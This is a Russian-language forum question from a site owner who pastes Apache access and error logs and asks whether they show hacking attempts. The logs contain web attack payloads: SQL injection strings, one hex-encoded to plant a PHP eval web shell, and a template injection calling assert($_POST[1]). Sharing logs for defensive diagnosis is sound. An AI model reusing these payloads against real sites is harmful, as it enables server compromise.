Логи Apache: попытки взлома? Как бороться с?

Я получил странные сообщения в доступе Apache и журналах ошибок с того же IP-адреса (xxx.xxx.xxx.xxx) на www.MYSITE.com (персональный сайт без финансовой заинтересованности...)

Я вижу код Php и SQL...

Это попытки взлома? Как бороться с овцами? Вы видите доказательства?

Спасибо за помощь.

Журнал доступа (извлечение)

www.MYWEBSITE.com XXX.XXX.XXX.XXX - - [02/Apr/2019:07:10:39 +0000] (0 s) "GET //user.php?act=login HTTP/1.1" 404 16 "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:289:\"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325175634768774a79776e50443977614841675a585a686243676b58314250553152625a5630704f79412f506d4669597963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:11:\"-1' UNION/*\";}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
www.MYWEBSITE.com XXX.XXX.XXX.XXX - - [02/Apr/2019:07:10:39 +0000] (0 s) "GET //d.php HTTP/1.1" 404 16 "http://www.MYWEBSITE.com//d.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
www.MYWEBSITE.com XXX.XXX.XXX.XXX - - [02/Apr/2019:07:10:40 +0000] (0 s) "GET //faq.php?action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 HTTP/1.1" 404 16 "http://www.MYWEBSITE.com//faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
www.MYWEBSITE.com XXX.XXX.XXX.XXX - - [02/Apr/2019:07:10:40 +0000] (0 s) "POST //plus/moon.php HTTP/1.1" 404 1339 "http://www.MYWEBSITE.com//plus/moon.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
www.MYWEBSITE.com XXX.XXX.XXX.XXX - - [02/Apr/2019:07:10:41 +0000] (0 s) "POST //plus/mytag_js.php?aid=9090 HTTP/1.1" 404 1339 "http://www.MYWEBSITE.com//plus/mytag_js.php?aid=9090" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
www.MYWEBSITE.com XXX.XXX.XXX.XXX - - [02/Apr/2019:07:10:41 +0000] (0 s) "GET //type.php?template=tag_(){};@unlink(FILE);print_r(xbshell);assert($_POST[1]);{//../rss HTTP/1.1" 404 16 "http://www.MYWEBSITE.com//type.php?template=tag_(){};@unlink(FILE);print_r(xbshell);assert($_POST[1]);{//../rss" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"

Журнал ошибок

[Tue Apr 02 07:10:39.299719 2019] [proxy_fcgi:error] [pid 2955:tid 139912242063104] [client XXX.XXX.XXX.XXX:23758] AH01071: Got error 'Primary script unknown\n', referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:289:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325175634768774a79776e50443977614841675a585a686243676b58314250553152625a5630704f79412f506d4669597963702729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a

[Tue Apr 02 07:10:39.544966 2019] [proxy_fcgi:error] [pid 2955:tid 139912233670400] [client XXX.XXX.XXX.XXX:23758] AH01071: Got error 'Primary script unknown\n', referer: http://www.MYWEBSITE.com//d.php

[Tue Apr 02 07:10:40.468119 2019] [proxy_fcgi:error] [pid 2955:tid 139912225277696] [client XXX.XXX.XXX.XXX:30300] AH01071: Got error 'Primary script unknown\n', referer: http://www.MYWEBSITE.com//faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

[Tue Apr 02 07:10:41.573902 2019] [proxy_fcgi:error] [pid 2955:tid 139912200099584] [client XXX.XXX.XXX.XXX:23758] AH01071: Got error 'Primary script unknown\n', referer: http://www.MYWEBSITE.com//type.php?template=tag_(){};@unlink(FILE);print_r(xbshell);assert($_POST[1]);{//../rss
Источник

0 ответов

Другие вопросы по тегам